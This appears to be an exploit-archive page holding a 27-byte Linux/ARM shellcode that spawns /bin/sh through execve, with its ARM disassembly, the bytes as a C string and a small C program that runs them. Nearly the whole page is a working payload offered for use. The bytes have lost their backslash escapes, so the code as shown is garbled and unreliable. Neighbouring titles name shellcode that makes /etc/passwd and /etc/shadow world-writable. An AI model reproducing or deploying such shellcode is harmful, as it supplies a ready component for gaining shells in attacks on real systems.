[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Linux/ARM - execve("/bin/sh", [0], [0 vars]) - 27 bytes
# Published : 2010-09-05
# Author :
# Previous Title : Linux x86 chmod 666 /etc/passwd & /etc/shadow - 57 bytes
# Next Title : ARM Bind Connect UDP Port 68


/*
Title:     Linux/ARM - execve("/bin/sh", [0], [0 vars]) - 27 bytes
Date:      2010-08-31
Tested on: ARM926EJ-S rev 5 (v5l)
Author:    Jonathan Salwan - twitter: @jonathansalwan

shell-storm.org

Shellcode ARM with not a 0x20, 0x0a and 0x00 


Disassembly of section .text:

00008054 <_start>:
    8054:	e28f3001 	add	r3, pc, #1	; 0x1
    8058:	e12fff13 	bx	r3
    805c:	4678      	mov	r0, pc
    805e:	3008      	adds	r0, #8
    8060:	1a49      	subs	r1, r1, r1
    8062:	1a92      	subs	r2, r2, r2
    8064:	270b      	movs	r7, #11
    8066:	df01      	svc	1
    8068:	622f      	str	r7, [r5, #32]
    806a:	6e69      	ldr	r1, [r5, #100]
    806c:	732f      	strb	r7, [r5, #12]
    806e:	0068      	lsls	r0, r5, #1

*/

#include <stdio.h>



char SC[] = "x01x30x8fxe2"
            "x13xffx2fxe1"
            "x78x46x08x30"
            "x49x1ax92x1a"
            "x0bx27x01xdf"
            "x2fx62x69x6e"
            "x2fx73x68";


int main(void)
{
        fprintf(stdout,"Length: %dn",strlen(SC));
        (*(void(*)()) SC)();
return 0;
}